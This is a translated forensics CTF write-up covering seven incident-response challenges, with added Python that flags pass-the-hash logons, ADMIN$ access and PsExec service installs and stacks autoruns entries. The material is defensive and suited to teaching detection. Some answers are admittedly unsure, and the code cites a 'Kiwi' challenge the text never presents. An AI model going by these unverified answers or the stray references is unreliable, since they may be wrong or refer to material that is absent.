
1. 2nd Base

Story

Once again, we have found ourselves with some malware running amuck our peasants.

However, this time we have made an image of a clean machine. Use it to compare the infected machine with the clean machine. Maybe it could help?

What is the malicious process?

Instructions

Submit the name and PID of the malicious process.

Process Name Format: ProcessName.exe


wp: The download includes two memory images; compare them.

First analyze the processes in the Baseline image.


Then look at the processes in the other image, the one that has the malicious process.


The suspicious process:


2. Meow

Story

We have met quite an advanced adversary.

Multiple accounts have been compromised on the network.

We think an attacker gained access to the DC and harvested the credentials.

We have imaged the domain controller and we think there should be some leftovers which can indicate which relevant tool has been used by the attacker. Can you find them?

Instructions

Submit the tool's name, which has been used by the attacker

Filename Format: FILE.EXT (ext stands for a 3-letter file extension)


wp: DC forensics

Find the name and path of a malicious tool.

Mount the image with FTK, then run data recovery.

3. Sad

Story

There is a station infected with ransomware (desktop-hub666e).

This station has some very valuable files. All of our transactions with the Iron Bank are kept there.

We have captured a PCAP and a memory dump of the station for some analysis.

We can't afford to pay the current ransom. We need the data inside that encrypted file.

Instructions

Submit the data in the encrypted file.


wp: Infected with ransomware; forensics on the pcap and the memory dump.

Key hint: WannaCry

PS: I did not manage to solve this one.

4. Insurance

Story

The user Robert had his wallpaper changed to a life insurance ad.

Robert says he did not do it. We assume someone connected to his machine and did so!

We have no idea how the insurance wallpaper got to the station. Any help?

Instructions

Submit the time stamp of the lateral movement technique used:

Timestamp: YYYY-MM-DD HH:MM (no seconds)


wp: The download is a VHDX image; keyword: PsExec

Load the image.

The logs copied out directly could not be used; data recovery was needed first, then the logs were copied out and examined.

In the logon logs, search for the keyword psexec.

PS: I don't know whether this was answered correctly.
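Both Kiwi (pass-the-hash found by auditing Security.evtx) and this challenge (PsExec lateral movement) come down to reading a handful of event types with the right fields. The following is an added example, not code from the original post; it runs over constructed event records shaped like the EventData fields of Security 4624/5140 and System 7045 (user names and times are invented, the host IP is the one the Kiwi brief gives) and applies three well-known heuristics: a 4624 network logon over NTLM with KeyLength 0 for a real user account as a pass-the-hash candidate, a 5140 access to ADMIN$, and a 7045 service install of PSEXESVC. Output times are cut to the minute, the format this challenge asks for.

```python
# Constructed event records shaped like Windows event fields (EventID, TimeCreated,
# plus EventData names as they appear in the XML view). Not from the challenge logs.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TimeCreated": "2020-02-08 14:52:10", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "LmPackageName": "-", "KeyLength": 0,
     "TargetUserName": "KingSlayer", "TargetDomainName": "GOT", "IpAddress": "172.16.44.135"},
    {"EventID": 4624, "TimeCreated": "2020-02-08 15:06:41", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1", "KeyLength": 0,
     "TargetUserName": "SAMPLE-USER", "TargetDomainName": "GOT", "IpAddress": "172.16.44.135"},
    {"EventID": 4624, "TimeCreated": "2020-02-08 15:07:02", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2", "KeyLength": 128,
     "TargetUserName": "ANONYMOUS LOGON", "TargetDomainName": "NT AUTHORITY", "IpAddress": "172.16.44.135"},
    {"EventID": 5140, "TimeCreated": "2020-02-08 15:09:29", "ShareName": "\\\\*\\ADMIN$",
     "SubjectUserName": "SAMPLE-USER", "IpAddress": "172.16.44.135"},
    {"EventID": 7045, "TimeCreated": "2020-02-08 15:09:30", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "AccountName": "LocalSystem"},
]


def is_pth_candidate(ev):
    """4624, network logon, NTLM, no session key, for a non-anonymous user account."""
    user = ev.get("TargetUserName", "")
    return (ev.get("EventID") == 4624 and ev.get("LogonType") == 3
            and ev.get("AuthenticationPackageName") == "NTLM"
            and ev.get("KeyLength") == 0
            and user != "ANONYMOUS LOGON" and not user.endswith("$"))


def detect_lateral_movement(events):
    """Time-ordered findings for pass-the-hash, ADMIN$ access and PsExec service installs."""
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        minute = ev["TimeCreated"][:16]  # YYYY-MM-DD HH:MM
        if is_pth_candidate(ev):
            findings.append({"time": minute, "technique": "pass-the-hash candidate (NTLM, KeyLength 0)",
                             "account": f'{ev["TargetDomainName"]}\\{ev["TargetUserName"]}',
                             "source_ip": ev.get("IpAddress")})
        elif ev["EventID"] == 5140 and ev.get("ShareName", "").upper().endswith("ADMIN$"):
            findings.append({"time": minute, "technique": "ADMIN$ share access (5140)",
                             "account": ev.get("SubjectUserName"), "source_ip": ev.get("IpAddress")})
        elif ev["EventID"] == 7045 and "PSEXESVC" in (
                ev.get("ServiceName", "") + ev.get("ImagePath", "")).upper():
            findings.append({"time": minute, "technique": "PsExec service install (7045)",
                             "account": ev.get("AccountName"), "source_ip": None})
    return findings


def pivot_by_account(findings):
    """Group (account, source_ip) pairs so the odd one out stands out."""
    out = {}
    for f in findings:
        out.setdefault((f["account"], f["source_ip"]), []).append(f["technique"])
    return out


if __name__ == "__main__":
    for f in detect_lateral_movement(SAMPLE_EVENTS):
        print(f'{f["time"]}  {f["technique"]:44} {f["account"]} from {f["source_ip"]}')
```

The NTLM/KeyLength-0 rule also fires on legitimate NTLMv1 logons, so it is a pivot rather than a verdict: what makes the Kiwi case stand out is a second domain account logging on from the King-Slayer host, and in Insurance the 5140 on ADMIN$ followed within a second by the PSEXESVC install is the pairing to look for (PsExec's -r option renames the service, so the ImagePath is checked as well).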

5. Layers

Story

We had an attacker on the network, we think we flushed him out, but we think there are still some other stations he had infected or had access to.

We ran Autoruns using Kansa on the stations, and saved each station's output in the following format: -Autorunsc.csv. Hopefully we can see if any station looks suspicious.

Instructions

Submit the most suspected computer name + name of suspicious artifact(filename).

Filename Format: filename.ext (ext stands for a 3-letter file extension)


wp: Keywords: Kansa, Stacking

Analysis of the Kansa collection output.

PS: I'm not sure whether this was answered correctly.
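Stacking is the least-frequency-of-occurrence idea behind Kansa's analysis scripts: collect the same artifact from every host, count on how many hosts each value appears, and look at the values that appear on only one or two. The same counting answers the 2nd Base challenge above, where a clean baseline image is available and anything present on the infected host but absent from the baseline is the candidate. The following is an added example, not code from the original post or from the Kansa project; it reads constructed Autorunsc-style CSV exports for three hosts (a reduced column set, with placeholder file names), stacks the Image Path column, names the host with the most rare entries, and diffs one host against a baseline.

```python
import csv
import io
from collections import Counter, defaultdict

# Constructed Autorunsc-style exports keyed by host name, with a reduced column set.
# File names under users\public are placeholders, not real indicators.
_COMMON = r"""Entry Location,Entry,Image Path,Signer
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,c:\windows\system32\securityhealthsystray.exe,(Verified) Microsoft Windows
HKLM\System\CurrentControlSet\Services,Dnscache,c:\windows\system32\dnsrslvr.dll,(Verified) Microsoft Windows
"""
HOST_CSVS = {
    "WS01": _COMMON,
    "WS02": _COMMON,
    "WS03": _COMMON
    + r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Updater,c:\users\public\updater.exe,(Not verified)"
    + "\n",
}


def load_hosts(host_csvs):
    """Parse each host's CSV text into a list of row dicts."""
    return {host: list(csv.DictReader(io.StringIO(text))) for host, text in host_csvs.items()}


def stack(hosts, key="Image Path"):
    """Count on how many hosts each value of `key` occurs, and remember where."""
    counts, where = Counter(), defaultdict(list)
    for host, rows in hosts.items():
        for value in {r[key].lower() for r in rows}:   # one count per host, not per row
            counts[value] += 1
            where[value].append(host)
    return counts, where


def rare_entries(hosts, key="Image Path", max_hosts=1):
    """Values seen on at most `max_hosts` hosts, with the hosts that have them."""
    counts, where = stack(hosts, key)
    return sorted((value, where[value]) for value, n in counts.items() if n <= max_hosts)


def most_suspicious_host(hosts, key="Image Path"):
    """(host, number of rare entries) for the host carrying the most outliers."""
    score = Counter()
    for _, owners in rare_entries(hosts, key):
        for host in owners:
            score[host] += 1
    return score.most_common(1)[0] if score else None


def diff_against_baseline(hosts, baseline, target, key="Image Path"):
    """Entries on `target` that the clean `baseline` does not have (the 2nd Base approach)."""
    base = {r[key].lower() for r in hosts[baseline]}
    return sorted({r[key].lower() for r in hosts[target]} - base)


if __name__ == "__main__":
    # On a real collection: HOST_CSVS = {path.stem.replace("-Autorunsc", ""): path.read_text()
    #                                   for path in Path("Autorunsc").glob("*-Autorunsc.csv")}
    hosts = load_hosts(HOST_CSVS)
    for value, owners in rare_entries(hosts):
        print(f"{value}  seen only on {owners}")
    print("most suspicious:", most_suspicious_host(hosts))
    print("WS03 vs baseline WS01:", diff_against_baseline(hosts, "WS01", "WS03"))
```

Stacking on Image Path alone is a starting point; on a real fleet the MD5/SHA-256 columns catch a renamed binary placed at a common path, and the Signer column narrows the rare set to unsigned or unverifiable entries first.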

6. Frog Find

Story

Classic case. We have a frog running loose and it's running havoc.

We have clear indication of malicious outgoing traffic to a host on the digital ocean.

We can’t seem to find the malicious process on the system.

We know there is a frog hidden in the malicious executable.

Find the process, extract the frog.

Instructions

Find the flag inside the malicious process.


wp: Keyword: Process Hollowing

Download the memory image and analyze it directly with Volatility.


The suspicious process:


Dump it out.


7. DB

Story

WAF logs show an unusual spike in SQL Injection attempts on our domain Westeros.GOT.com in the last days (since 4.2.2020).

We are afraid an attacker might have been able to access the server using the SQL Injection.

Please make sure whether the attacker was able or not to successfully use the SQL injection to gain access to the server.

If he did, what is the time he did so?

Instructions

Submit the time when the attacker gained access to the OS.

Time format: YYYY-MM-DD HH:MM (no seconds)


wp: The server was SQL-injected.

Look for execution times after February 4, 2020, and find the time at which system access was obtained.

In the downloaded VHDX file, find the Windows Security log.

Found two times: 2020-02-04 23:56 and 2020-02-05 00:07

PS: I submitted the first one, which seems to have been wrong.

Final score:


Final ranking:

Notes

This article is original content by 合天网安实验室; please credit the source when reposting.

About 合天网安实验室

合天网安实验室 (www.hetianlab.com) is a leading hands-on online cyber security education platform in China.

Real environments and hands-on online learning of cyber security; lab content covers system security, software security, network security, web security, mobile security, CTF, forensic analysis, penetration testing, security awareness education, and more.

合天网安 forensic analysis course: http://s.htlabs.vip/foa

合天网安 forensic analysis challenge course: http://s.htlabs.vip/foc
